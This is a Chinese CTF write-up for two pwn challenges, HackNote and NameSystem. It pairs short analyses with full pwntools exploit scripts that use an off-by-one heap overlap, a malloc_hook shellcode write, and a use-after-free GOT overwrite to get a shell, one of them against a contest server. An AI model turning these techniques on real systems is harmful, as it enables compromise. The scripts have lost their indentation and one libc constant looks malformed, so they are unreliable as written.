湖湘杯复赛题目-writeup

还是要多刷多复现堆题啊

0x01 HackNodte

分析

这道题是静态链接,修改时用的是strlen,造成了off-by-one,所以堆重叠。然后把chunk分配到main_arena上,再修改unsortedbin,分配到malloc_hook

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
from pwn import *
sh = process('./HackNote')
gdb.attach(sh,'b*0x400BFD')

malloc_hook = 0x6CB788
free_hook = 0x6CD5E8

def add(size,content):
sh.sendlineafter('-----------------\n','1')
sh.sendlineafter(':\n',str(size))
sh.sendafter(':\n',content)

def delete(idx):
sh.sendlineafter('-----------------\n','2')
sh.sendlineafter(':\n',str(idx))

def edit(idx,content):
sh.sendlineafter('-----------------\n','3')
sh.sendlineafter(':\n',str(idx))
sh.sendafter(':\n',content)
context(os = 'linux',arch = 'amd64')

add(0x108, "a\n")#0
add(0x220, "b" * 0x1f0 + p64(0x200) + "\n")#1
add(0x100, "c\n")#2
add(0x100,'d\n')#3

edit(0,0x108*'a')
delete(1)
edit(0,0x108*'a'+'\n')

add(0xe0,'a\n') #1
add(0x50,'b\n') #4
add(0x60,'c\n') #5

delete(1)
delete(2)

add(0x330,'a\n') #1
delete(4)
delete(5)

edit(1,'e'*0xe8 + p64(0x60)+p64(0x71)+p64(0)*10+p64(0x71)+p64(0x6cb820)+'\n')

add(0x50,'c\n') #4 向main_arena中写入0x71
add(0x60,'d\n') #5
add(0x60,p64(0) * 5 + p64(0x6CB788 - 0x10) + "\n" )#5 分配到main_arena并修改unsortedbin
add(0x60, p64(0x6cb790) + asm(shellcraft.sh()) + "\n")#5 向malloc_hook中写入shellcode
sh.sendlineafter('-----------------\n','1')
sh.sendlineafter(':\n','1')

sh.interactive()

0x02 NameSystem

这道题有个uaf一开始还真没看出来。。。。先把bss段上的一个堆指针改成got表上的内容,再把free的got表内容改成puts@plt,从而可以泄露libc,最后再把free@got改成system,然后执行就可以获得shell。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
from pwn import *

def add(size, content):
r.sendline("1")
r.sendlineafter("Name Size:", str(size))
r.sendlineafter("Name:", content)
r.recvuntil("Your choice :\n")

def dele(index):
r.sendline("3")
r.sendlineafter("The id you want to delete:", str(index))
r.recvuntil("Your choice :\n")

#r = process("./NameSystem")
r = remote("183.129.189.62", "15505")
r.recvuntil("Your choice :\n")

for i in range(18):
add(0x40, "a")


add(0x60, "a")
add(0x60, "a")

dele(0)
dele(18)
dele(17)
dele(19)
dele(0)

add(0x50, "a")
add(0x50, "a")

dele(0)
dele(18)
dele(17)
dele(19)
dele(0)

add(0x30, "a")
add(0x30, "a")

dele(0)
dele(18)
dele(17)
dele(19)
for i in range(13):
dele(0)

add(0x60, p64(0x60208d))
add(0x60, p64(0))
add(0x60, "/bin/sh\x00")
add(0x60, "\x00" * 3 + p64(0x602060))

add(0x50, p64(0x601ffa))
add(0x50, p64(0))
add(0x50, "/bin/sh\x00")
add(0x50, "\x00" * 6 + p64(0x41) + p32(0x4006A0) + "\x00" * 3)

r.sendline("3")
r.sendlineafter("The id you want to delete:", str(0))

libc = u64(r.recvuntil("\n").ljust(8, "\x00")) + 0x7fb44b795000 - 0xa7fb44b7cbe80

add(0x30, p64(0x602008))
add(0x30, p64(0))
add(0x30, "/bin/sh\x00")
add(0x30, p64(libc + 0x45390)[:7])

r.sendline("3")
r.sendlineafter("The id you want to delete:", str(15))

#gdb.attach(r)
print "libc: " + hex(libc)

r.interactive()
-------------本文结束感谢您的阅读-------------
+ +